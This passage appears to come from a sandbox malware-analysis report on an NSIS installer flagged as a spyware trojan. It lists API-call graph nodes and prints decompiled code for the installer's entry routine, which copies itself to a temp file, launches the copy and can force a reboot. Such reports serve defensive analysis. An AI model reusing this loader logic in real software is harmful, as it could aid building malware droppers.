4059c2 GetDlgItem CreateThread CloseHandle 4208->4210 4211 4059ea 4208->4211 4210->4211 4213 405a01 ShowWindow ShowWindow 4211->4213 4214 405a3a 4211->4214 4215 405a15 4211->4215 4212 4058a0 4217 4058a7 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4212->4217 4253 4045ff SendMessageW 4213->4253 4221 404631 8 API calls 4214->4221 4216 405a75 4215->4216 4219 405a29 4215->4219 4220 405a4f ShowWindow 4215->4220 4216->4214 4226 405a83 SendMessageW 4216->4226 4224 405915 4217->4224 4225 4058f9 SendMessageW SendMessageW 4217->4225 4227 4045a3 SendMessageW 4219->4227 4222 405a61 4220->4222 4223 405a6f 4220->4223 4228 405a48 4221->4228 4229 4056d0 24 API calls 4222->4229 4230 4045a3 SendMessageW 4223->4230 4231 405928 4224->4231 4232 40591a SendMessageW 4224->4232 4225->4224 4226->4228 4233 405a9c CreatePopupMenu 4226->4233 4227->4214 4229->4223 4230->4216 4235 4045ca 18 API calls 4231->4235 4232->4231 4234 4066ab 17 API calls 4233->4234 4236 405aac AppendMenuW 4234->4236 4237 405938 4235->4237 4238 405ac9 GetWindowRect 4236->4238 4239 405adc TrackPopupMenu 4236->4239 4240 405941 ShowWindow 4237->4240 4241 405975 GetDlgItem SendMessageW 4237->4241 4238->4239 4239->4228 4243 405af7 4239->4243 4244 405964 4240->4244 4245 405957 ShowWindow 4240->4245 4241->4228 4242 40599c SendMessageW SendMessageW 4241->4242 4242->4228 4246 405b13 SendMessageW 4243->4246 4252 4045ff SendMessageW 4244->4252 4245->4244 4246->4246 4248 405b30 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4246->4248 4249 405b55 SendMessageW 4248->4249 4249->4249 4250 405b7e GlobalUnlock SetClipboardData CloseClipboard 4249->4250 4250->4228 4251->4212 4252->4241 4253->4215 4254 404e11 4255 404e21 4254->4255 4256 404e3d 4254->4256 4265 405cb2 GetDlgItemTextW 4255->4265 4258 404e70 4256->4258 4259 404e43 SHGetPathFromIDListW 4256->4259 4261 404e5a SendMessageW 4259->4261 4262 404e53 4259->4262 4260 404e2e SendMessageW 4260->4256 4261->4258 4264 40140b 2 API calls 4262->4264 4264->4261 4265->4260 4266 401491 4267 4056d0 24 API calls 4266->4267 4268 401498 4267->4268 4269 402891 4270 402898 4269->4270 4271 402ba9 4269->4271 4272 402d84 17 API calls 4270->4272 4273 40289f 4272->4273 4274 4028ae SetFilePointer 4273->4274 4274->4271 4275 4028be 4274->4275 4277 4065b5 wsprintfW 4275->4277 4277->4271 4278 401f12 4279 402da6 17 API calls 4278->4279 4280 401f18 4279->4280 4281 402da6 17 API calls 4280->4281 4282 401f21 4281->4282 4283 402da6 17 API calls 4282->4283 4284 401f2a 4283->4284 4285 402da6 17 API calls 4284->4285 4286 401f33 4285->4286 4287 401423 24 API calls 4286->4287 4288 401f3a 4287->4288 4295 405c94 ShellExecuteExW 4288->4295 4290 401f82 4291 406ae6 5 API calls 4290->4291 4293 40292e 4290->4293 4292 401f9f CloseHandle 4291->4292 4292->4293 4295->4290 4296 402f93 4297 402fa5 SetTimer 4296->4297 4298 402fbe 4296->4298 4297->4298 4299 40300c 4298->4299 4300 403012 MulDiv 4298->4300 4301 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4300->4301 4301->4299 4303 401d17 4304 402d84 17 API calls 4303->4304 4305 401d1d IsWindow 4304->4305 4306 401a20 4305->4306 4307 401b9b 4308 401ba8 4307->4308 4309 401bec 4307->4309 4310 401c31 4308->4310 4317 401bbf 4308->4317 4311 401bf1 4309->4311 4312 401c16 GlobalAlloc 4309->4312 4313 4066ab 17 API calls 4310->4313 4321 40239d 4310->4321 4311->4321 4328 40666e lstrcpynW 4311->4328 4314 4066ab 17 API calls 4312->4314 4315 402397 4313->4315 4314->4310 4320 405cce MessageBoxIndirectW 4315->4320 4326 40666e lstrcpynW 4317->4326 4318 401c03 GlobalFree 4318->4321 4320->4321 4322 401bce 4327 40666e lstrcpynW 4322->4327 4324 401bdd 4329 40666e lstrcpynW 4324->4329 4326->4322 4327->4324 4328->4318 4329->4321 4330 40261c 4331 402da6 17 API calls 4330->4331 4332 402623 4331->4332 4335 40615e GetFileAttributesW CreateFileW 4332->4335 4334 40262f 4335->4334 4336 40149e 4337 4014ac PostQuitMessage 4336->4337 4338 40239d 4336->4338 4337->4338 4339 40259e 4349 402de6 4339->4349 4342 402d84 17 API calls 4343 4025b1 4342->4343 4344 4025d9 RegEnumValueW 4343->4344 4345 4025cd RegEnumKeyW 4343->4345 4347 40292e 4343->4347 4346 4025ee RegCloseKey 4344->4346 4345->4346 4346->4347 4350 402da6 17 API calls 4349->4350 4351 402dfd 4350->4351 4352 4064db RegOpenKeyExW 4351->4352 4353 4025a8 4352->4353 4353->4342 4354 4015a3 4355 402da6 17 API calls 4354->4355 4356 4015aa SetFileAttributesW 4355->4356 4357 4015bc 4356->4357 3287 401fa4 3288 402da6 17 API calls 3287->3288 3289 401faa 3288->3289 3290 4056d0 24 API calls 3289->3290 3291 401fb4 3290->3291 3302 405c51 CreateProcessW 3291->3302 3294 401fdd CloseHandle 3298 40292e 3294->3298 3297 401fcf 3299 401fd4 3297->3299 3300 401fdf 3297->3300 3310 4065b5 wsprintfW 3299->3310 3300->3294 3303 401fba 3302->3303 3304 405c84 CloseHandle 3302->3304 3303->3294 3303->3298 3305 406ae6 WaitForSingleObject 3303->3305 3304->3303 3306 406b00 3305->3306 3307 406b12 GetExitCodeProcess 3306->3307 3311 406a77 3306->3311 3307->3297 3310->3294 3312 406a94 PeekMessageW 3311->3312 3313 406aa4 WaitForSingleObject 3312->3313 3314 406a8a DispatchMessageW 3312->3314 3313->3306 3314->3312 4358 40202a 4359 402da6 17 API calls 4358->4359 4360 402031 4359->4360 4361 406a3b 5 API calls 4360->4361 4362 402040 4361->4362 4363 4020cc 4362->4363 4364 40205c GlobalAlloc 4362->4364 4364->4363 4365 402070 4364->4365 4366 406a3b 5 API calls 4365->4366 4367 402077 4366->4367 4368 406a3b 5 API calls 4367->4368 4369 402081 4368->4369 4369->4363 4373 4065b5 wsprintfW 4369->4373 4371 4020ba 4374 4065b5 wsprintfW 4371->4374 4373->4371 4374->4363 4375 40252a 4376 402de6 17 API calls 4375->4376 4377 402534 4376->4377 4378 402da6 17 API calls 4377->4378 4379 40253d 4378->4379 4380 402548 RegQueryValueExW 4379->4380 4383 40292e 4379->4383 4381 402568 4380->4381 4382 40256e RegCloseKey 4380->4382 4381->4382 4386 4065b5 wsprintfW 4381->4386 4382->4383 4386->4382 4387 4021aa 4388 402da6 17 API calls 4387->4388 4389 4021b1 4388->4389 4390 402da6 17 API calls 4389->4390 4391 4021bb 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4021c5 4392->4393 4394 402da6 17 API calls 4393->4394 4395 4021cf 4394->4395 4396 402da6 17 API calls 4395->4396 4397 4021d9 4396->4397 4398 402218 CoCreateInstance 4397->4398 4399 402da6 17 API calls 4397->4399 4402 402237 4398->4402 4399->4398 4400 401423 24 API calls 4401 4022f6 4400->4401 4402->4400 4402->4401 3699 403c2b 3700 403c46 3699->3700 3701 403c3c CloseHandle 3699->3701 3702 403c50 CloseHandle 3700->3702 3703 403c5a 3700->3703 3701->3700 3702->3703 3708 403c88 3703->3708 3706 405d7a 67 API calls 3707 403c6b 3706->3707 3709 403c96 3708->3709 3710 403c5f 3709->3710 3711 403c9b FreeLibrary GlobalFree 3709->3711 3710->3706 3711->3710 3711->3711 4403 401a30 4404 402da6 17 API calls 4403->4404 4405 401a39 ExpandEnvironmentStringsW 4404->4405 4406 401a4d 4405->4406 4408 401a60 4405->4408 4407 401a52 lstrcmpW 4406->4407 4406->4408 4407->4408 4414 4023b2 4415 4023c0 4414->4415 4416 4023ba 4414->4416 4418 4023ce 4415->4418 4419 402da6 17 API calls 4415->4419 4417 402da6 17 API calls 4416->4417 4417->4415 4420 4023dc 4418->4420 4422 402da6 17 API calls 4418->4422 4419->4418 4421 402da6 17 API calls 4420->4421 4423 4023e5 WritePrivateProfileStringW 4421->4423 4422->4420 4424 402434 4425 402467 4424->4425 4426 40243c 4424->4426 4428 402da6 17 API calls 4425->4428 4427 402de6 17 API calls 4426->4427 4429 402443 4427->4429 4430 40246e 4428->4430 4432 40247b 4429->4432 4433 402da6 17 API calls 4429->4433 4435 402e64 4430->4435 4434 402454 RegDeleteValueW RegCloseKey 4433->4434 4434->4432 4436 402e78 4435->4436 4438 402e71 4435->4438 4436->4438 4439 402ea9 4436->4439 4438->4432 4440 4064db RegOpenKeyExW 4439->4440 4441 402ed7 4440->4441 4442 402f81 4441->4442 4443 402ee7 RegEnumValueW 4441->4443 4447 402f0a 4441->4447 4442->4438 4444 402f71 RegCloseKey 4443->4444 4443->4447 4444->4442 4445 402f46 RegEnumKeyW 4446 402f4f RegCloseKey 4445->4446 4445->4447 4448 406a3b 5 API calls 4446->4448 4447->4444 4447->4445 4447->4446 4449 402ea9 6 API calls 4447->4449 4450 402f5f 4448->4450 4449->4447 4450->4442 4451 402f63 RegDeleteKeyW 4450->4451 4451->4442 4452 401735 4453 402da6 17 API calls 4452->4453 4454 40173c SearchPathW 4453->4454 4455 401757 4454->4455 4456 405037 GetDlgItem GetDlgItem 4457 405089 7 API calls 4456->4457 4468 4052ae 4456->4468 4458 405130 DeleteObject 4457->4458 4459 405123 SendMessageW 4457->4459 4460 405139 4458->4460 4459->4458 4462 405170 4460->4462 4463 4066ab 17 API calls 4460->4463 4461 405390 4465 40543c 4461->4465 4475 4053e9 SendMessageW 4461->4475 4499 4052a1 4461->4499 4464 4045ca 18 API calls 4462->4464 4469 405152 SendMessageW SendMessageW 4463->4469 4470 405184 4464->4470 4466 405446 SendMessageW 4465->4466 4467 40544e 4465->4467 4466->4467 4477 405460 ImageList_Destroy 4467->4477 4478 405467 4467->4478 4489 405477 4467->4489 4468->4461 4473 404f85 5 API calls 4468->4473 4495 40531d 4468->4495 4469->4460 4474 4045ca 18 API calls 4470->4474 4471 405382 SendMessageW 4471->4461 4472 404631 8 API calls 4476 40563d 4472->4476 4473->4495 4486 405195 4474->4486 4480 4053fe SendMessageW 4475->4480 4475->4499 4477->4478 4481 405470 GlobalFree 4478->4481 4478->4489 4479 4055f1 4484 405603 ShowWindow GetDlgItem ShowWindow 4479->4484 4479->4499 4483 405411 4480->4483 4481->4489 4482 405270 GetWindowLongW SetWindowLongW 4485 405289 4482->4485 4490 405422 SendMessageW 4483->4490 4484->4499 4487 4052a6 4485->4487 4488 40528e ShowWindow 4485->4488 4486->4482 4491 40526b 4486->4491 4494 4051e8 SendMessageW 4486->4494 4496 405226 SendMessageW 4486->4496 4497 40523a SendMessageW 4486->4497 4509 4045ff SendMessageW 4487->4509 4508 4045ff SendMessageW 4488->4508 4489->4479 4498 405005 4 API calls 4489->4498 4503 4054b2 4489->4503 4490->4465 4491->4482 4491->4485 4494->4486 4495->4461 4495->4471 4496->4486 4497->4486 4498->4503 4499->4472 4500 4055bc 4501 4055c7 InvalidateRect 4500->4501 4504 4055d3 4500->4504 4501->4504 4502 4054e0 SendMessageW 4507 4054f6 4502->4507 4503->4502 4503->4507 4504->4479 4510 404f40 4504->4510 4506 40556a SendMessageW SendMessageW 4506->4507 4507->4500 4507->4506 4508->4499 4509->4468 4513 404e77 4510->4513 4512 404f55 4512->4479 4514 404e90 4513->4514 4515 4066ab 17 API calls 4514->4515 4516 404ef4 4515->4516 4517 4066ab 17 API calls 4516->4517 4518 404eff 4517->4518 4519 4066ab 17 API calls 4518->4519 4520 404f15 lstrlenW wsprintfW SetDlgItemTextW 4519->4520 4520->4512 4521 401d38 4522 402d84 17 API calls 4521->4522 4523 401d3f 4522->4523 4524 402d84 17 API calls 4523->4524 4525 401d4b GetDlgItem 4524->4525 4526 402638 4525->4526 4527 4014b8 4528 4014be 4527->4528 4529 401389 2 API calls 4528->4529 4530 4014c6 4529->4530 4531 40473a lstrlenW 4532 404759 4531->4532 4533 40475b WideCharToMultiByte 4531->4533 4532->4533 4534 404abb 4535 404ae7 4534->4535 4536 404af8 4534->4536 4595 405cb2 GetDlgItemTextW 4535->4595 4538 404b04 GetDlgItem 4536->4538 4543 404b63 4536->4543 4541 404b18 4538->4541 4539 404c47 4544 404df6 4539->4544 4597 405cb2 GetDlgItemTextW 4539->4597 4540 404af2 4542 4068f5 5 API calls 4540->4542 4546 404b2c SetWindowTextW 4541->4546 4547 405fe8 4 API calls 4541->4547 4542->4536 4543->4539 4543->4544 4548 4066ab 17 API calls 4543->4548 4551 404631 8 API calls 4544->4551 4550 4045ca 18 API calls 4546->4550 4552 404b22 4547->4552 4553 404bd7 SHBrowseForFolderW 4548->4553 4549 404c77 4554 406045 18 API calls 4549->4554 4555 404b48 4550->4555 4556 404e0a 4551->4556 4552->4546 4560 405f3d 3 API calls 4552->4560 4553->4539 4557 404bef CoTaskMemFree 4553->4557 4558 404c7d 4554->4558 4559 4045ca 18 API calls 4555->4559 4561 405f3d 3 API calls 4557->4561 4598 40666e lstrcpynW 4558->4598 4562 404b56 4559->4562 4560->4546 4563 404bfc 4561->4563 4596 4045ff SendMessageW 4562->4596 4566 404c33 SetDlgItemTextW 4563->4566 4571 4066ab 17 API calls 4563->4571 4566->4539 4567 404b5c 4569 406a3b 5 API calls 4567->4569 4568 404c94 4570 406a3b 5 API calls 4568->4570 4569->4543 4577 404c9b 4570->4577 4572 404c1b lstrcmpiW 4571->4572 4572->4566 4575 404c2c lstrcatW 4572->4575 4573 404cdc 4599 40666e lstrcpynW 4573->4599 4575->4566 4576 404ce3 4578 405fe8 4 API calls 4576->4578 4577->4573 4581 405f89 2 API calls 4577->4581 4583 404d34 4577->4583 4579 404ce9 GetDiskFreeSpaceW 4578->4579 4582 404d0d MulDiv 4579->4582 4579->4583 4581->4577 4582->4583 4584 404da5 4583->4584 4586 404f40 20 API calls 4583->4586 4585 404dc8 4584->4585 4587 40140b 2 API calls 4584->4587 4600 4045ec EnableWindow 4585->4600 4588 404d92 4586->4588 4587->4585 4590 404da7 SetDlgItemTextW 4588->4590 4591 404d97 4588->4591 4590->4584 4593 404e77 20 API calls 4591->4593 4592 404de4 4592->4544 4594 404a14 SendMessageW 4592->4594 4593->4584 4594->4544 4595->4540 4596->4567 4597->4549 4598->4568 4599->4576 4600->4592 4601 40263e 4602 402652 4601->4602 4603 40266d 4601->4603 4604 402d84 17 API calls 4602->4604 4605 402672 4603->4605 4606 40269d 4603->4606 4613 402659 4604->4613 4607 402da6 17 API calls 4605->4607 4608 402da6 17 API calls 4606->4608 4609 402679 4607->4609 4610 4026a4 lstrlenW 4608->4610 4618 406690 WideCharToMultiByte 4609->4618 4610->4613 4612 40268d lstrlenA 4612->4613 4614 4026e7 4613->4614 4616 40623f 5 API calls 4613->4616 4617 4026d1 4613->4617 4615 406210 WriteFile 4615->4614 4616->4617 4617->4614 4617->4615 4618->4612

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 0 403646-403696 SetErrorMode GetVersionExW 1 4036d0-4036d7 0->1 2 403698-4036cc GetVersionExW 0->2 3 4036e1-403721 1->3 4 4036d9 1->4 2->1 5 403723-40372b call 406a3b 3->5 6 403734 3->6 4->3 5->6 12 40372d 5->12 7 403739-40374d call 4069cb lstrlenA 6->7 13 40374f-40376b call 406a3b * 3 7->13 12->6 20 40377c-4037de #17 OleInitialize SHGetFileInfoW call 40666e GetCommandLineW call 40666e 13->20 21 40376d-403773 13->21 28 4037e0-4037e2 20->28 29 4037e7-4037fa call 405f6a CharNextW 20->29 21->20 26 403775 21->26 26->20 28->29 32 4038f1-4038f7 29->32 33 4038fd 32->33 34 4037ff-403805 32->34 37 403911-40392b GetTempPathW call 403615 33->37 35 403807-40380c 34->35 36 40380e-403814 34->36 35->35 35->36 39 403816-40381a 36->39 40 40381b-40381f 36->40 44 403983-40399b DeleteFileW call 4030d0 37->44 45 40392d-40394b GetWindowsDirectoryW lstrcatW call 403615 37->45 39->40 42 403825-40382b 40->42 43 4038df-4038ed call 405f6a 40->43 47 403845-40387e 42->47 48 40382d-403834 42->48 43->32 61 4038ef-4038f0 43->61 66 4039a1-4039a7 44->66 67 403b72-403b80 ExitProcess OleUninitialize 44->67 45->44 64 40394d-40397d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403615 45->64 49 403880-403885 47->49 50 40389a-4038d4 47->50 54 403836-403839 48->54 55 40383b 48->55 49->50 56 403887-40388f 49->56 58 4038d6-4038da 50->58 59 4038dc-4038de 50->59 54->47 54->55 55->47 62 403891-403894 56->62 63 403896 56->63 58->59 65 4038ff-40390c call 40666e 58->65 59->43 61->32 62->50 62->63 63->50 64->44 64->67 65->37 71 4039ad-4039c0 call 405f6a 66->71 72 403a4e-403a55 call 403d1d 66->72 68 403b82-403b91 call 405cce ExitProcess 67->68 69 403b97-403b9d 67->69 75 403c15-403c1d 69->75 76 403b9f-403bb4 GetCurrentProcess OpenProcessToken 69->76 87 403a12-403a1f 71->87 88 4039c2-4039f7 71->88 80 403a5a-403a5d 72->80 81 403c22-403c25 ExitProcess 75->81 82 403c1f 75->82 84 403be5-403bf3 call 406a3b 76->84 85 403bb6-403bdf LookupPrivilegeValueW AdjustTokenPrivileges 76->85 80->67 82->81 98 403c01-403c0c ExitWindowsEx 84->98 99 403bf5-403bff 84->99 85->84 91 403a21-403a2f call 406045 87->91 92 403a62-403a76 call 405c39 lstrcatW 87->92 90 4039f9-4039fd 88->90 94 403a06-403a0e 90->94 95 4039ff-403a04 90->95 91->67 107 403a35-403a4b call 40666e * 2 91->107 105 403a83-403a9d lstrcatW lstrcmpiW 92->105 106 403a78-403a7e lstrcatW 92->106 94->90 101 403a10 94->101 95->94 95->101 98->75 100 403c0e-403c10 call 40140b 98->100 99->98 99->100 100->75 101->87 109 403b70 105->109 110 403aa3-403aa6 105->110 106->105 107->72 109->67 112 403aa8-403aad call 405b9f 110->112 113 403aaf call 405c1c 110->113 119 403ab4-403ac4 SetCurrentDirectoryW 112->119 113->119 121 403ad1-403afd call 40666e 119->121 122 403ac6-403acc call 40666e 119->122 126 403b02-403b1d call 4066ab DeleteFileW 121->126 122->121 129 403b5d-403b67 126->129 130 403b1f-403b2f CopyFileW 126->130 129->126 132 403b69-403b6b call 40642e 129->132 130->129 131 403b31-403b51 call 40642e call 4066ab call 405c51 130->131 131->129 140 403b53-403b5a CloseHandle 131->140 132->109 140->129
            C-Code - Quality: 78%
            			_entry_() {
            				WCHAR* _v8;
            				signed int _v12;
            				void* _v16;
            				signed int _v20;
            				int _v24;
            				int _v28;
            				struct _TOKEN_PRIVILEGES _v40;
            				signed char _v42;
            				int _v44;
            				signed int _v48;
            				intOrPtr _v278;
            				signed short _v310;
            				struct _OSVERSIONINFOW _v324;
            				struct _SHFILEINFOW _v1016;
            				intOrPtr* _t88;
            				WCHAR* _t92;
            				char* _t94;
            				void _t97;
            				void* _t116;
            				WCHAR* _t118;
            				signed int _t119;
            				intOrPtr* _t123;
            				void* _t137;
            				void* _t143;
            				void* _t148;
            				void* _t152;
            				void* _t157;
            				signed int _t167;
            				void* _t170;
            				void* _t175;
            				intOrPtr _t177;
            				intOrPtr _t178;
            				intOrPtr* _t179;
            				int _t188;
            				void* _t189;
            				void* _t198;
            				signed int _t204;
            				signed int _t209;
            				signed int _t214;
            				signed int _t216;
            				int* _t218;
            				signed int _t226;
            				signed int _t229;
            				CHAR* _t231;
            				char* _t232;
            				signed int _t233;
            				WCHAR* _t234;
            				void* _t250;
            
            				_t216 = 0x20;
            				_t188 = 0;
            				_v24 = 0;
            				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
            				_v20 = 0;
            				SetErrorMode(0x8001); // executed
            				_v324.szCSDVersion = 0;
            				_v48 = 0;
            				_v44 = 0;
            				_v324.dwOSVersionInfoSize = 0x11c;
            				if(GetVersionExW( &_v324) == 0) {
            					_v324.dwOSVersionInfoSize = 0x114;
            					GetVersionExW( &_v324);
            					asm("sbb eax, eax");
            					_v42 = 4;
            					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
            				}
            				if(_v324.dwMajorVersion < 0xa) {
            					_v310 = _v310 & 0x00000000;
            				}
            				 *0x7a8b58 = _v324.dwBuildNumber;
            				 *0x7a8b5c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
            				if( *0x7a8b5e != 0x600) {
            					_t179 = E00406A3B(_t188);
            					if(_t179 != _t188) {
            						 *_t179(0xc00);
            					}
            				}
            				_t231 = "UXTHEME";
            				do {
            					E004069CB(_t231); // executed
            					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
            				} while ( *_t231 != 0);
            				E00406A3B(0xb);
            				 *0x7a8aa4 = E00406A3B(9);
            				_t88 = E00406A3B(7);
            				if(_t88 != _t188) {
            					_t88 =  *_t88(0x1e);
            					if(_t88 != 0) {
            						 *0x7a8b5c =  *0x7a8b5c | 0x00000080;
            					}
            				}
            				__imp__#17();
            				__imp__OleInitialize(_t188); // executed
            				 *0x7a8b60 = _t88;
            				SHGetFileInfoW(0x79ff48, _t188,  &_v1016, 0x2b4, _t188); // executed
            				E0040666E(0x7a7aa0, L"NSIS Error");
            				_t92 = GetCommandLineW();
            				_t232 = L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe\" ";
            				E0040666E(_t232, _t92);
            				_t94 = _t232;
            				_t233 = 0x22;
            				 *0x7a8aa0 = 0x400000;
            				_t250 = L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe\" " - _t233; // 0x22
            				if(_t250 == 0) {
            					_t216 = _t233;
            					_t94 =  &M007B3002;
            				}
            				_t198 = CharNextW(E00405F6A(_t94, _t216));
            				_v16 = _t198;
            				while(1) {
            					_t97 =  *_t198;
            					_t251 = _t97 - _t188;
            					if(_t97 == _t188) {
            						break;
            					}
            					_t209 = 0x20;
            					__eflags = _t97 - _t209;
            					if(_t97 != _t209) {
            						L17:
            						__eflags =  *_t198 - _t233;
            						_v12 = _t209;
            						if( *_t198 == _t233) {
            							_v12 = _t233;
            							_t198 = _t198 + 2;
            							__eflags = _t198;
            						}
            						__eflags =  *_t198 - 0x2f;
            						if( *_t198 != 0x2f) {
            							L32:
            							_t198 = E00405F6A(_t198, _v12);
            							__eflags =  *_t198 - _t233;
            							if(__eflags == 0) {
            								_t198 = _t198 + 2;
            								__eflags = _t198;
            							}
            							continue;
            						} else {
            							_t198 = _t198 + 2;
            							__eflags =  *_t198 - 0x53;
            							if( *_t198 != 0x53) {
            								L24:
            								asm("cdq");
            								asm("cdq");
            								_t214 = L"NCRC" & 0x0000ffff;
            								asm("cdq");
            								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
            								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
            								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
            									L29:
            									asm("cdq");
            									asm("cdq");
            									_t209 = L" /D=" & 0x0000ffff;
            									asm("cdq");
            									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
            									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
            									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
            										L31:
            										_t233 = 0x22;
            										goto L32;
            									}
            									__eflags =  *_t198 - _t229;
            									if( *_t198 == _t229) {
            										 *(_t198 - 4) = _t188;
            										__eflags = _t198;
            										E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t198);
            										L37:
            										_t234 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
            										GetTempPathW(0x400, _t234);
            										_t116 = E00403615(_t198, _t251);
            										_t252 = _t116;
            										if(_t116 != 0) {
            											L40:
            											DeleteFileW(L"1033"); // executed
            											_t118 = E004030D0(_t254, _v20); // executed
            											_v8 = _t118;
            											if(_t118 != _t188) {
            												L68:
            												ExitProcess(); // executed
            												__imp__OleUninitialize(); // executed
            												if(_v8 == _t188) {
            													if( *0x7a8b34 == _t188) {
            														L77:
            														_t119 =  *0x7a8b4c;
            														if(_t119 != 0xffffffff) {
            															_v24 = _t119;
            														}
            														ExitProcess(_v24);
            													}
            													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
            														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
            														_v40.PrivilegeCount = 1;
            														_v28 = 2;
            														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
            													}
            													_t123 = E00406A3B(4);
            													if(_t123 == _t188) {
            														L75:
            														if(ExitWindowsEx(2, 0x80040002) != 0) {
            															goto L77;
            														}
            														goto L76;
            													} else {
            														_push(0x80040002);
            														_push(0x25);
            														_push(_t188);
            														_push(_t188);
            														_push(_t188);
            														if( *_t123() == 0) {
            															L76:
            															E0040140B(9);
            															goto L77;
            														}
            														goto L75;
            													}
            												}
            												E00405CCE(_v8, 0x200010);
            												ExitProcess(2);
            											}
            											if( *0x7a8abc == _t188) {
            												L51:
            												 *0x7a8b4c =  *0x7a8b4c | 0xffffffff;
            												_v24 = E00403D1D(_t264);
            												goto L68;
            											}
            											_t218 = E00405F6A(L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe\" ", _t188);
            											if(_t218 < L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe\" ") {
            												L48:
            												_t263 = _t218 - L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe\" ";
            												_v8 = L"Error launching installer";
            												if(_t218 < L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe\" ") {
            													_t189 = E00405C39(__eflags);
            													lstrcatW(_t234, L"~nsu");
            													__eflags = _t189;
            													if(_t189 != 0) {
            														lstrcatW(_t234, "A");
            													}
            													lstrcatW(_t234, L".tmp");
            													_t219 = L"C:\\Users\\jones\\Desktop";
            													_t137 = lstrcmpiW(_t234, L"C:\\Users\\jones\\Desktop");
            													__eflags = _t137;
            													if(_t137 == 0) {
            														L67:
            														_t188 = 0;
            														__eflags = 0;
            														goto L68;
            													} else {
            														__eflags = _t189;
            														_push(_t234);
            														if(_t189 == 0) {
            															E00405C1C();
            														} else {
            															E00405B9F();
            														}
            														SetCurrentDirectoryW(_t234);
            														__eflags = L"C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
            														if(__eflags == 0) {
            															E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t219);
            														}
            														E0040666E(0x7a9000, _v16);
            														_t201 = "A" & 0x0000ffff;
            														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
            														__eflags = _t143;
            														_v12 = 0x1a;
            														 *0x7a9800 = _t143;
            														do {
            															E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x120)));
            															DeleteFileW(0x79f748);
            															__eflags = _v8;
            															if(_v8 != 0) {
            																_t148 = CopyFileW(L"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe", 0x79f748, 1);
            																__eflags = _t148;
            																if(_t148 != 0) {
            																	E0040642E(_t201, 0x79f748, 0);
            																	E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x124)));
            																	_t152 = E00405C51(0x79f748);
            																	__eflags = _t152;
            																	if(_t152 != 0) {
            																		CloseHandle(_t152);
            																		_v8 = 0;
            																	}
            																}
            															}
            															 *0x7a9800 =  *0x7a9800 + 1;
            															_t61 =  &_v12;
            															 *_t61 = _v12 - 1;
            															__eflags =  *_t61;
            														} while ( *_t61 != 0);
            														E0040642E(_t201, _t234, 0);
            														goto L67;
            													}
            												}
            												 *_t218 = _t188;
            												_t221 =  &(_t218[2]);
            												_t157 = E00406045(_t263,  &(_t218[2]));
            												_t264 = _t157;
            												if(_t157 == 0) {
            													goto L68;
            												}
            												E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t221);
            												E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t221);
            												_v8 = _t188;
            												goto L51;
            											}
            											asm("cdq");
            											asm("cdq");
            											asm("cdq");
            											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
            											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
            											while( *_t218 != _t204 || _t218[1] != _t167) {
            												_t218 = _t218;
            												if(_t218 >= L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe\" ") {
            													continue;
            												}
            												break;
            											}
            											_t188 = 0;
            											goto L48;
            										}
            										GetWindowsDirectoryW(_t234, 0x3fb);
            										lstrcatW(_t234, L"\\Temp");
            										_t170 = E00403615(_t198, _t252);
            										_t253 = _t170;
            										if(_t170 != 0) {
            											goto L40;
            										}
            										GetTempPathW(0x3fc, _t234);
            										lstrcatW(_t234, L"Low");
            										SetEnvironmentVariableW(L"TEMP", _t234);
            										SetEnvironmentVariableW(L"TMP", _t234);
            										_t175 = E00403615(_t198, _t253);
